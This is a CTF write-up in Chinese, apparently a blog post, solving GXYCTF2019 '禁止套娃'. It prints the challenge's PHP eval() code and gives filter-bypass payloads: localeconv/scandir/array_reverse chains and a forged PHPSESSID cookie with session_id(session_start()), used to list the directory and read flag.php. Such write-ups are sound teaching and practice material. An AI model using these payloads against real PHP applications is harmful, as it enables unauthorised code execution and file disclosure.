[GXYCTF2019]禁止套娃 无回显 RCE 过滤__FILE__ dirname等

扫除git

通过githack

获取index.php

复制代码
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

发现是命令执行 并且存在过滤

我们之前使用的 print_r(dirname(FILE));

在这里不可以使用

1.localeconv()

直接上payload了

复制代码
print_r(localeconv());

通过current指定第一个 .

复制代码
?exp=print_r(current(localeconv()));

这样我们配合 scandir 就可以实现 scandir('.')了

复制代码
?exp=print_r(scandir(current(localeconv())));

这里我们无法使用[] 所以我们可以通过 array_reverse 倒序数组 然后next即可

复制代码
?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
复制代码
/?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

2.seesion_id

正常情况下 不开启 seesion 服务 但是如果我们可以通过 seesion_start()开启

我们就可以通过 seesion传递值

复制代码
?exp=print_r(session_id(session_start()))


bp中加

Cookie: PHPSESSID=flag.php

然后一样通过 highlight_file即可

相关推荐
爱隐身的官人6 分钟前
cfshow-web入门-php特性
python·php·ctf
leo__5208 小时前
在Ubuntu 22.04系统中无需重启设置静态IP地址
tcp/ip·ubuntu·php
爱隐身的官人13 小时前
ctfshow - web - 命令执行漏洞总结(二)
php·命令执行
悠悠~飘1 天前
php简介(第一天打卡)
php
久绊A1 天前
Hydra-SSH 破解安全防范
开发语言·php
黑白世界46481 天前
开源分享: php-tools php gui的一次尝试
后端·php
2503_928411561 天前
9.8 ajax+php基础语法
ajax·okhttp·php
普通网友2 天前
支持二次开发的代练App源码:订单管理、代练监控、安全护航功能齐全,一站式解决代练护航平台源码(PHP+ Uni-app)
安全·uni-app·php
yenggd2 天前
centos系统apache支持php配置
centos·php·apache
ytttr8732 天前
PHP中各种超全局变量使用的过程
开发语言·php